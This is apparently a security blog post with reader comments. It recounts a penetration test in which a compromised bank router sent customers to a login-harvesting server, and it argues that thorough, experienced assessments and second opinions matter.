|
After Two Security Assessments I Must Be Secure, Right? Imagine you are the CIO of a national financial institution and you’ve recently deployed a state of the art online transaction service for your customers. To make sure your company’s network perimeter is secure, you executed two external security assessments and penetration tests. When the final report came in, your company was given a clean bill of health. At first, you felt relieved, and confident in your security measures. Shortly thereafter, your relief turned to concern. “Is it really possible that we are completely secure?” Given you’re skepticism, you decide to get one more opinion. The day of the penetration test report delivery is now at hand. Based on the previous assessments, you expect to receive nothing but positive information…
The Results Were Less Than Pleasing
During this penetration test, there were several interesting findings, but we are going to focus on one that would knock the wind out of anyone responsible for the security of online systems. Particularly if you are in the business of money.
Most people are familiar with the term “Phishing”. Dictionary.com defines the word Phishing as “the practice of luring unsuspecting Internet users to a fake Web site by using authentic-looking email with the real organization’s logo, in an attempt to steal passwords, financial or personal information, or introduce a virus attack; the creation of a Web site replica for fooling unsuspecting Internet users into submitting personal or financial information or passwords”. Although SPAM / unsolicited e-mail and direct web server compromise are the most common methods of Phishing. There are other ways to accomplish this fraudulent activity.
Internet Router Compromise Makes For a Bad Day
In this case, the Internet router was compromised by using a well-known CISCO vulnerability. Once this was accomplished, the sky was the limit as far as what could be done to impact the organization. Even though the company’s web server was secure, and the Firewall that was protecting the web server was configured adequately, what took place next made these defense systems irrelevant.
Instead of setting up a duplicate login site on an external system, then sending out SPAM in order to entice a customer to give up their user ID, password, and account numbers, another approach, a much more nefarious approach was taken.
Phishing for Personal or Financial Information
You remember that router that was compromised? For proof of concept purposes, the router configuration was altered to forward all Internet traffic bound for the legitimate web server, to another web server where user ID, password, and account information could be collected. The first time this information was entered, the customer would receive an ambiguous error. The second time the page loaded, the fake web server redirected the customer to the real site. When the user re-entered the requested information, everything worked just fine.
No one, not the customer, nor the company had any idea that something nefarious was going on. No bells or whistle went off, no one questioned the error. Why would they; they could have put the wrong password in, or it was likely a typical error on a web page that everyone deals with from time to time.
At this point, you can let your imagination take over. The attacker may not move forward and use the information collected right away. It could be days or weeks before it is used. Any trace of what actually took place to collect the information would most likely be history.
What Do You Really Get Out Of Security Assessments
I can’t tell you how many times I’ve been presented with security assessment reports that are pretty much information output from an off-the-shelf or open source automated security analyzer. Although an attacker may use the same or similar tools during an attack, they do not solely rely on this information to reach their goal. An effective penetration test or security assessment must be performed by someone who understands not only “security vulnerabilities” and how to run off-the-shelf tools. The person executing the assessment must do so armed with the tools and experience that meets or exceeds those a potential attacker would have. Conclusion
Whether you are a small, medium, are large company, you must be very careful about who you decide is most qualified to perform a review of your company’s security defense systems, or security profile. Just because an organization presents you with credentials, such as consultants with their CISSP…, it does not mean these people have any real-world experience. All the certifications in the world cannot assure you the results you receive from engaging in a security assessment are thorough/complete. Getting a second opinion is appropriate given what may be at stake. If you were not feeling well, and knew that something was wrong with you, would you settle for just one Doctor’s opinion?
Quite frankly, I’ve never met a hacker (I know I will get slammed for using this term, I always do), that has a certification stating that they know what they are doing. They know what they are doing because they’ve done it, over and over again, and have a complete understanding of network systems and software. On top of that, the one thing they have that no class or certification can teach you is ‘imagination’.
Sponsored byIPv4.Global
Sponsored byVerisign
Sponsored byDNIB.com
Sponsored byCSC
Sponsored byRadix
Sponsored byWhoisXML API
Sponsored byVerisign
What the author described is an illegal intercept (basically, a wiretap), rather than phishing, which occurs out of band to the enterprise. Its a bad idea to try to conflate these terms.
Security engineers and “experts” think they understand networking. In reality, most security experts understand host security quite well. They falter when they must deal with true network security issues, such as securing network infrastructure. The usually just ignore routers and switches - a big mistake.
Use of the Secure IOS template at cymru.com will solve many of the common enterprise router security issues.
Daniel,
You are right on the mark with your assessment. Although this not phishing in the “traditional” method, it is a means to an end. It was not my intention to conflate the terms, only to show there are other methods of achieving the same objective (In this case, Phishing).
You are also correct in your assessment of the majority of security engineers. Many of the most basic, non-host based issues are overlooked. This is why I tend to become engaged as a second or third opinion. I have an extensive background in networking and many OS platforms. Most of the security flaws / configuration issues I find are initially overlooked because of lack of experience with a broad range of technology and the inability to look at networks and networked systems with a broad scope.
DWM
The real question here is - are these network vulnerabilities a greater threat than someone posing as a telephone company employee and installing a wiretap? Could the bank avoid the problem by using an ISP that is more concientious about the security of their routers and DNS servers, or do these problems affect all ISPs?
David,
it is certainly the case that some ISPs are better than others in network security areas, it would be surprising if it was otherwise.
I did a DNS review for a large merchant bank, and as part of that I reviewed (without intrusive scanning) the security of the DNS servers providing domain services for a selection of about 30 domains owned by the bank in a diverse set of countries (and the security of the parent domains, right back to the root DNS servers).
There were huge differences, providers failing to provide suitable redundancy, providers running servers with known vulnerabilities, domains with inappropriate dependencies on a wide range of servers, versus providers who provided both suitable redundancy, and up to date software.
In this instance the review was tightly focused on the domain name service, because that is what the client was interested in improving, but I’m confident similar surveys in other areas would produce similar results.
The company that hired me to do the analysis was one such supplier, and one of those who “did it right”, but I guess that is why they were chosen to manage the review process.
However attempts to “sell” this knowledge to banks (and others) for my own business benefit was less successful, but that may be that I’m a techy, and not a salesman.